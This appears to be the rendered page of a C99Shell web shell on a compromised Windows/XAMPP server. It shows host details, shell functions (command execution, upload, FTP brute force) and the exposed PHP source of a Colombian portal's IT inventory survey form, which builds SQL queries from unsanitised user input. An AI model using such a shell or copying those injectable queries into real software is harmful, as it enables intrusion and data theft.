!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\portel_dama\administracion\formas\   drwxrwxrwx
Free 8.79 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     encuesta_sys_inventario.php (31.1 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    $ib 
= isset($id);
    if (
$ib == false) {
        
$id 0;
    }
    
$ia = isset($accion);
    if (
$ia == false) {
        
$accion "x";
    }
    include(
'setup_administracion.php');
    include(
'../clases_herramientas/include_acciones.php');
    include(
'pass.php');
    
$id_app 72;
    
$accion_1 0;
    if (
$accion == "ins_") {
        
$accion "-1";
        
$id_inventario $last_insert_id;
        
$accion_1 2;
    }
    
// 0. Extracción de la Entidad
    
$donde_entidad "administracion_contacto.contacto_nombre = '$user' and administracion_pertenencia_fuente_contacto.contacto_id = administracion_contacto.contacto_id and administracion_pertenencia_fuente_contacto.fuente_id = administracion_fuente.fuente_id";
    
$control = new select_v1(0"administracion_pertenencia_fuente_contacto.fuente_id, administracion_fuente.fuente_nombre""administracion_pertenencia_fuente_contacto, administracion_fuente, administracion_contacto"$donde_entidad20"(id)-(nombre)""""");
    
$entidad_id $control->RESULTADOS[0][0];
    
$entidad $control->RESULTADOS[0][1];
    
    
// 0.5 Saber si ya esta ingresada
    
if ($accion == "x") {
        
$donde_encuesta "id_entidad = '$entidad_id'";
        
$control = new select_v1(0"id_inventario""encuesta_sys_inventario"$donde_encuesta10"(id)""""");
        
//echo $control->NUMERO_REGISTROS;
        
if ($control->NUMERO_REGISTROS != 0) {
            
$id_inventario $control->RESULTADOS[0][0];
            
$accion "-1";
            
$accion_1 1;
        }
    }
?> 
<link href="<?php echo $archivo_css?>" rel="stylesheet" type="text/css">
<title><?php echo $nombre_pagina?></title>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_callJS(jsStr) { //v2.0
  return eval(jsStr)
}

function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
//-->
</script>
<body bgcolor="<?php echo $color_fondo?>" leftmargin="0" topmargin="0">
<table width="100%" border="0" cellspacing="0" cellpadding="10">
  <tr>
    <td bgcolor="<?php echo $color_fondo_banner?>"> 
      <table width="100%" border="0" cellspacing="0" cellpadding="0">
        <tr>
          <td width="25%" valign="bottom"><img src="<?php echo $imagen_banner?>" width="<?php echo $ancho_banner?>" height="<?php echo $alto_banner?>"></td>
          <td width="50%" valign="bottom" class="texto"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="texto">
              <tr> 
                <td width="25%"><img src="../imagenes/user.gif" width="22" height="28">UR: 
                  <?php echo $user?> / <?php echo $entidad?></td>
                <td width="25%" align="right"><a href="<?php echo $home_administrador?>"><img src="../imagenes/home.gif" alt="Ir al men&uacute; principal" width="32" height="29" border="0"></a><a href="#" onClick="MM_callJS('history.go(-1);')"><img src="../imagenes/back.gif" alt="Regresar" width="32" height="29" border="0"></a><a href="#"><img src="../imagenes/help_big.gif" alt="Ayuda General" width="34" height="29" border="0" onClick="MM_openBrWindow('aviso.php?tipo=2&idapp=<?php echo $id_app?>','','scrollbars=yes,width=400,height=300')"></a></td>
              </tr>
            </table></td>
          <td width="25%" align="right" valign="bottom" class="texto">&nbsp;</td>
        </tr>
      </table></td>
  </tr>
  <tr> 
    <td bgcolor="<?php echo $color_fondo_cuerpo?>"><table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
        <?php if ($accion == "-1" and $accion_1 == 2) { ?>
        <tr>
          <td align="center"><table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
              <tr> 
                <td width="25%">&nbsp;</td>
                <td width="50%" bgcolor="#FF66CC"><strong>Paso 2. </strong><font color="#FFFFFF"><strong>Complete 
                  su encuesta con los registros de equipos y programas</strong></font></td>
                <td width="25%">&nbsp;</td>
              </tr>
            </table>
            <p><a href="encuesta_sys_inventario.php?id_inventario=<?php echo $id_inventario?>&x_y=<?php echo $x_y?>&user=<?php echo $user?>&accion=-1&id_app=72"><font size="4">Haga 
              clic aqui para continuar</font></a></p>
            <p><font color="#FF66CC">Nota:</font> La forma que usted encontrar&aacute; 
              a continuaci&oacute;n brinda la opci&oacute;n de editar los datos<br>
              de la encuesta ya agregada, tanto como permitir la adici&oacute;n 
              de registros de equipos y software.</p></td>
        </tr>
        <?php ?>
        <?php if ($accion == "-1" and $accion_1 == 1) { ?>
        <tr>
          <td align="center">Ya existe un inventario asociado con su entidad, 
            <a href="encuesta_sys_inventario.php?id_inventario=<?php echo $id_inventario?>&x_y=<?php echo $x_y?>&user=<?php echo $user?>&accion=-1&id_app=72">haga clic aqui para editar</a></td>
        </tr>
        <?php ?>
        <?php if ($accion == "lock") { ?>
        <tr> 
          <td><form name="form2" method="post" action="">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr> 
                  <td>&nbsp;</td>
                  <td align="left">Seleccionar Inventarios:</td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td width="50%" align="center"><input name="id_app" type="hidden" id="id_app2" value="<?php echo $id_app?>"> 
                    <select name="id_inventario">
                      <?php $control = new select_v1(0"id_inventario""encuesta_sys_inventario""id_inventario != 0"10"(id)""<option value=\"(id)\">(id)</option>"""); ?>
                    </select> <select name="accion">
                      <option value="-1">Editar</option>
                      <option value="del_">Borrar</option>
                    </select> <input type="submit" name="Submit2" value="Ir..."> 
                    <input name="x_y" type="hidden" id="accion" value="<?php echo $uid->UID?>"> 
                    <input name="user" type="hidden" id="accion" value="<?php echo $user?>"> 
                  </td>
                  <td width="25%">&nbsp;</td>
                </tr>
              </table>
            </form></td>
        </tr>
        <?php ?>
        <?php if ($accion == "x") { ?>
        <tr> 
          <td><form action="" method="post" enctype="multipart/form-data" name="form1">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr> 
                  <td>&nbsp;</td>
                  <td colspan="2" align="left" bgcolor="#FF66CC"><font color="#FFFFFF"><strong><font color="#000000">Paso 
                    1.</font> Agregar Inventario</strong></font></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Su entidad cuenta 
                    con LAN?:</td>
                  <td bgcolor="#FFFFFF"> <select name="red_lan" id="select4">
                      <?php $control = new select_v2(19); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td width="25%" align="right" bgcolor="#FFFFFF">&iquest;Cuantos 
                    computadores tienen acceso a la Red?:<font color="#FF0000">&nbsp;</font></td>
                  <td width="25%" bgcolor="#FFFFFF"> <input name="red_n_c_a_r" type="text" id="red_n_c_a_r"></td>
                  <td width="25%">&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cuenta con acceso 
                    a Internet?:</td>
                  <td bgcolor="#FFFFFF"><select name="red_wan" id="select7">
                      <?php $control = new select_v2(19); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Qu&eacute; tipo 
                    de acceso tiene?: </td>
                  <td bgcolor="#FFFFFF"><select name="red_tipo_wan" id="select8">
                      <?php $control = new select_v2(20); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cuantos PCs tiene 
                    acceso a Internet?:</td>
                  <td bgcolor="#FFFFFF"><input name="red_n_c_a_wan" type="text" id="red_n_c_a_wan"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Tiene un sitio Web?:</td>
                  <td bgcolor="#FFFFFF"><select name="red_web" id="select9">
                      <?php $control = new select_v2(19); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cual tecnolog&iacute;a 
                    de Desarrollo usa su sitio?: </td>
                  <td bgcolor="#FFFFFF"><select name="red_tipo_web_l" id="select10">
                      <?php $control = new select_v2(21); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cual tecnolog&iacute;a 
                    de Base de Datos usa su sitio?:</td>
                  <td bgcolor="#FFFFFF"><select name="red_tipo_web_db" id="select11">
                      <?php $control = new select_v2(22); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;El alojamiento del 
                    sitio se hace en?:</td>
                  <td bgcolor="#FFFFFF"><select name="red_web_host" id="select12">
                      <?php $control = new select_v2(31); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cuenta con Intranet?:</td>
                  <td bgcolor="#FFFFFF"><select name="red_iweb" id="select13">
                      <?php $control = new select_v2(19); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cual tecnolog&iacute;a 
                    de Desarrollo usa su Intranet?:</td>
                  <td bgcolor="#FFFFFF"><select name="red_tipo_iweb_l" id="select14">
                      <?php $control = new select_v2(21); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cual tecnolog&iacute;a 
                    de Base de Datos usa su Intranet?:</td>
                  <td bgcolor="#FFFFFF"><select name="red_tipo_iweb_db" id="select15">
                      <?php $control = new select_v2(22); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cuenta con correo 
                    electr&oacute;nico?:</td>
                  <td bgcolor="#FFFFFF"><select name="red_mail" id="select16">
                      <?php $control = new select_v2(19); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cuantos funcionarios 
                    tienen cuenta de correo?:</td>
                  <td bgcolor="#FFFFFF"><input name="red_n_f_mail" type="text" id="red_n_f_mail"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cual considera que 
                    es la necesidad m&aacute;s apremiante que tiene su entidad?</td>
                  <td bgcolor="#FFFFFF"><select name="red_n_a" id="select17">
                      <?php $control = new select_v2(23); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td colspan="2" align="center" bgcolor="#FFFFFF"> <input name="id_app" type="hidden" id="id_app3" value="<?php echo $id_app?>"> 
                    <input name="accion" type="hidden" id="accion" value="ins_"> 
                    <input type="submit" name="Submit" value="Agregar..."> <input name="x_y" type="hidden" id="accion" value="<?php echo $uid->UID?>"> 
                    <input name="user" type="hidden" id="accion" value="<?php echo $user?>">
                    <input name="id_entidad" type="hidden" id="id_entidad" value="<?php echo $entidad_id?>"> 
                  </td>
                  <td width="25%">&nbsp;</td>
                </tr>
              </table>
            </form></td>
        </tr>
        <?php ?>
        <?php 
        
if ($accion == "-1" and $accion_1 == 0) { ?>
        <tr> 
          <td><form name="form3" method="post" action="" enctype="multipart/form-data">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr> 
                  <td>&nbsp;</td>
                  <td colspan="2" align="left" bgcolor="#FF66CC"><font color="#FFFFFF"><strong><font color="#000000">3.</font> 
                    Editar Inventario</strong></font></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td width="25%" align="right" bgcolor="#FFFFFF">&iquest;Su entidad 
                    cuenta con LAN?:</td>
                  <td width="25%" bgcolor="#FFFFFF"> 
                    <?php $control = new arreglo_constante(19); ?>
                    <select name="red_lan" id="select2">
                      <?php $control_f = new filtrar_select_edicion(""""""$control->ARREGLO_NOMBRES$control->ARREGLO_VALORES"id_inventario""red_lan"$arreglo->RESULTADOS[0][0], "encuesta_sys_inventario""foto_tipo"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cuantos computadores 
                    tienen acceso a la Red?:<font color="#FF0000">&nbsp;</font></td>
                  <td bgcolor="#FFFFFF"><input name="red_n_c_a_r" type="text" id="red_n_c_a_r" value="<?php echo $arreglo->RESULTADOS[0][3?>"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cuenta con acceso 
                    a Internet?:</td>
                  <td bgcolor="#FFFFFF"> 
                    <?php $control = new arreglo_constante(19); ?>
                    <select name="red_wan" id="select19">
                      <?php $control_f = new filtrar_select_edicion(""""""$control->ARREGLO_NOMBRES$control->ARREGLO_VALORES"id_inventario""red_wan"$arreglo->RESULTADOS[0][0], "encuesta_sys_inventario""foto_tipo"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Qu&eacute; tipo 
                    de acceso tiene?: </td>
                  <td bgcolor="#FFFFFF"> 
                    <?php $control = new arreglo_constante(20); ?>
                    <select name="red_tipo_wan" id="select20">
                      <?php $control_f = new filtrar_select_edicion(""""""$control->ARREGLO_NOMBRES$control->ARREGLO_VALORES"id_inventario""red_tipo_wan"$arreglo->RESULTADOS[0][0], "encuesta_sys_inventario""foto_tipo"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cuantos PCs tiene 
                    acceso a Internet?:</td>
                  <td bgcolor="#FFFFFF"> <input name="red_n_c_a_wan" type="text" id="red_n_c_a_wan" value="<?php echo $arreglo->RESULTADOS[0][6?>"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Tiene un sitio Web?:</td>
                  <td bgcolor="#FFFFFF"> 
                    <?php $control = new arreglo_constante(19); ?>
                    <select name="red_web" id="select22">
                      <?php $control_f = new filtrar_select_edicion(""""""$control->ARREGLO_NOMBRES$control->ARREGLO_VALORES"id_inventario""red_web"$arreglo->RESULTADOS[0][0], "encuesta_sys_inventario""foto_tipo"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cual tecnolog&iacute;a 
                    de Desarrollo usa su sitio?: </td>
                  <td bgcolor="#FFFFFF"> 
                    <?php $control = new arreglo_constante(21); ?>
                    <select name="red_tipo_web_l" id="select23">
                      <?php $control_f = new filtrar_select_edicion(""""""$control->ARREGLO_NOMBRES$control->ARREGLO_VALORES"id_inventario""red_tipo_web_l"$arreglo->RESULTADOS[0][0], "encuesta_sys_inventario""foto_tipo"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cual tecnolog&iacute;a 
                    de Base de Datos usa su sitio?:</td>
                  <td bgcolor="#FFFFFF"> 
                    <?php $control = new arreglo_constante(22); ?>
                    <select name="red_tipo_web_db" id="select24">
                      <?php $control_f = new filtrar_select_edicion(""""""$control->ARREGLO_NOMBRES$control->ARREGLO_VALORES"id_inventario""red_tipo_web_db"$arreglo->RESULTADOS[0][0], "encuesta_sys_inventario""foto_tipo"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;El alojamiento del 
                    sitio se hace en?:</td>
                  <td bgcolor="#FFFFFF"> 
                    <?php $control = new arreglo_constante(31); ?>
                    <select name="red_web_host" id="select25">
                      <?php $control_f = new filtrar_select_edicion(""""""$control->ARREGLO_NOMBRES$control->ARREGLO_VALORES"id_inventario""red_web_host"$arreglo->RESULTADOS[0][0], "encuesta_sys_inventario""foto_tipo"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cuenta con Intranet?:</td>
                  <td bgcolor="#FFFFFF"> 
                    <?php $control = new arreglo_constante(19); ?>
                    <select name="red_iweb" id="select26">
                      <?php $control_f = new filtrar_select_edicion(""""""$control->ARREGLO_NOMBRES$control->ARREGLO_VALORES"id_inventario""red_iweb"$arreglo->RESULTADOS[0][0], "encuesta_sys_inventario""foto_tipo"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cual tecnolog&iacute;a 
                    de Desarrollo usa su Intranet?:</td>
                  <td bgcolor="#FFFFFF"> 
                    <?php $control = new arreglo_constante(21); ?>
                    <select name="red_tipo_iweb_l" id="select27">
                      <?php $control_f = new filtrar_select_edicion(""""""$control->ARREGLO_NOMBRES$control->ARREGLO_VALORES"id_inventario""red_tipo_web_l"$arreglo->RESULTADOS[0][0], "encuesta_sys_inventario""foto_tipo"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cual tecnolog&iacute;a 
                    de Base de Datos usa su Intranet?:</td>
                  <td bgcolor="#FFFFFF"> 
                    <?php $control = new arreglo_constante(22); ?>
                    <select name="red_tipo_iweb_db" id="select28">
                      <?php $control_f = new filtrar_select_edicion(""""""$control->ARREGLO_NOMBRES$control->ARREGLO_VALORES"id_inventario""red_tipo_web_db"$arreglo->RESULTADOS[0][0], "encuesta_sys_inventario""foto_tipo"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cuenta con correo 
                    electr&oacute;nico?:</td>
                  <td bgcolor="#FFFFFF"> 
                    <?php $control = new arreglo_constante(19); ?>
                    <select name="red_mail" id="select29">
                      <?php $control_f = new filtrar_select_edicion(""""""$control->ARREGLO_NOMBRES$control->ARREGLO_VALORES"id_inventario""red_mail"$arreglo->RESULTADOS[0][0], "encuesta_sys_inventario""foto_tipo"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cuantos funcionarios 
                    tienen cuenta de correo?:</td>
                  <td bgcolor="#FFFFFF"><input name="red_n_f_mail" type="text" id="red_n_f_mail" value="<?php echo $arreglo->RESULTADOS[0][15?>"> 
                  </td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">&iquest;Cual considera que 
                    es la necesidad m&aacute;s apremiante que tiene su entidad?</td>
                  <td bgcolor="#FFFFFF"> 
                    <?php $control = new arreglo_constante(23); ?>
                    <select name="red_n_a" id="select31">
                      <?php $control_f = new filtrar_select_edicion(""""""$control->ARREGLO_NOMBRES$control->ARREGLO_VALORES"id_inventario""red_n_a"$arreglo->RESULTADOS[0][0], "encuesta_sys_inventario""foto_tipo"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td colspan="2" align="center" bgcolor="#FFFFFF"> <input name="id_app" type="hidden" id="id_app" value="<?php echo $id_app?>"> 
                    <input name="id_inventario" type="hidden" id="accion2" value="<?php echo $arreglo->RESULTADOS[0][0]; ?>"> 
                    <input name="accion" type="hidden" id="accion4" value="edi_"> 
                    <input type="submit" name="Submit3" value="Editar..."> <input name="x_y" type="hidden" id="accion" value="<?php echo $uid->UID?>"> 
                    <input name="user" type="hidden" id="accion" value="<?php echo $user?>"></td>
                  <td width="25%">&nbsp;</td>
                </tr>
              </table>
            </form></td>
        </tr>
        <tr> 
          <td><form name="form4" method="post" action="encuesta_sys_equipo.php">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr> 
                  <td>&nbsp;</td>
                  <td bgcolor="#FF66CC"><font color="#FFFFFF"><strong><font color="#000000">4.</font> 
                    Registros de Equipos</strong></font></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right"><a href="encuesta_sys_equipo.php?id_inventario=<?php echo $arreglo->RESULTADOS[0][0]; ?>&x_y=<?php echo $x_y?>&user=<?php echo $user?>"><strong>Agregar 
                    Registros de Equipos</strong></a></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td><strong>Editar o Borrar Registros de Equipos de este Inventario:</strong></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td> <div align="right"></div>
                    <select name="id_equipo" id="select">
                      <?php 
                  $cuando 
"encuesta_sys_equipo.id_inventario =" $arreglo->RESULTADOS[0][0];
                  
$control = new select_v1(0"id_equipo, nombre_equipo""encuesta_sys_equipo"$cuando20"(id)-(nombre)""<option value=\"(id)\">(nombre)</option>"""); ?>
                    </select> <select name="accion" id="accion_contacto">
                      <option value="-1">Editar</option>
                      <option value="del_">Borrar</option>
                    </select> <input type="submit" name="Submit4" value="Ir..."> 
                    <input name="id_app" type="hidden" id="id_app5" value="73"> 
                    <input name="x_y" type="hidden" id="x_y" value="<?php echo $uid->UID?>"> 
                    <input name="user" type="hidden" id="x_y" value="<?php echo $user?>">
                    <br>
                  </td>
                  <td width="25%">&nbsp;</td>
                </tr>
                <tr>
                  <td>&nbsp;</td>
                  <td><img src="../imagenes/linea_admon.gif" width="397" height="11"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td><strong>Listado Resumen de Registros de Equipos en este 
                    Inventario.</strong><br> <br> 
                    <?php $control = new select_v1(0"id_equipo, nombre_equipo, cantidad_equipo""encuesta_sys_equipo"$cuando30"(id)-(nombre)-(can)""<b>(id)</b> - (nombre) - (x(can))<br>"""); ?>
                  </td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td><img src="../imagenes/linea_admon.gif" width="397" height="11"></td>
                  <td>&nbsp;</td>
                </tr>
              </table>
            </form></td>
        </tr>
        <tr> 
          <td><form name="form4" method="post" action="encuesta_sys_software.php">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr> 
                  <td>&nbsp;</td>
                  <td bgcolor="#FF66CC"><font color="#FFFFFF"><strong><font color="#000000">5.</font> 
                    Registro de Software</strong></font></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right"><a href="encuesta_sys_software.php?id_inventario=<?php echo $arreglo->RESULTADOS[0][0]; ?>&x_y=<?php echo $x_y?>&user=<?php echo $user?>"><strong>Agregar 
                    Registros de Software</strong></a></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td><strong>Editar o Borrar Registros de Software de este Inventario:</strong></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td> <div align="right"></div>
                    <select name="id_software" id="select">
                      <?php 
                  $cuando 
"encuesta_sys_software.id_inventario =" $arreglo->RESULTADOS[0][0];
                  
$control = new select_v1(0"id_software, nombre_software""encuesta_sys_software"$cuando20"(id)-(nombre)""<option value=\"(id)\">(nombre)</option>"""); ?>
                    </select> <select name="accion" id="select3">
                      <option value="-1">Editar</option>
                      <option value="del_">Borrar</option>
                    </select> <input type="submit" name="Submit42" value="Ir..."> 
                    <input name="id_app" type="hidden" id="id_app4" value="74"> 
                    <input name="x_y" type="hidden" id="x_y2" value="<?php echo $uid->UID?>"> 
                    <input name="user" type="hidden" id="x_y2" value="<?php echo $user?>">
                    <br>
                  </td>
                  <td width="25%">&nbsp;</td>
                </tr>
                <tr>
                  <td>&nbsp;</td>
                  <td><img src="../imagenes/linea_admon.gif" width="397" height="11"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td><strong>Listado Resumen de Registros de Software en este 
                    Inventario.</strong><br> <br> 
                    <?php $control = new select_v1(0"id_software, nombre_software""encuesta_sys_software"$cuando20"(id)-(nombre)""<b>(id)</b> - (nombre)<br>"""); ?>
                  </td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td><img src="../imagenes/linea_admon.gif" width="397" height="11"></td>
                  <td>&nbsp;</td>
                </tr>
              </table>
            </form></td>
        </tr>
        <?php ?>
      </table></td>
  </tr>
  <tr> 
    <td align="center" bgcolor="<?php echo $color_fondo_pie?>" class="textopequeno"><?php echo $nombre_cliente?><br>
      Todos los Derechos Reservados para NRG<br>
      Bogot&aacute;, Colombia, S.A. <?php echo $ano_vig?><br>
      <a href="../../documentacion/terminos.htm">Terminos de Uso</a> <strong>I</strong> 
      <a href="../../documentacion/terms.htm">Terms of Use</a></td>
  </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--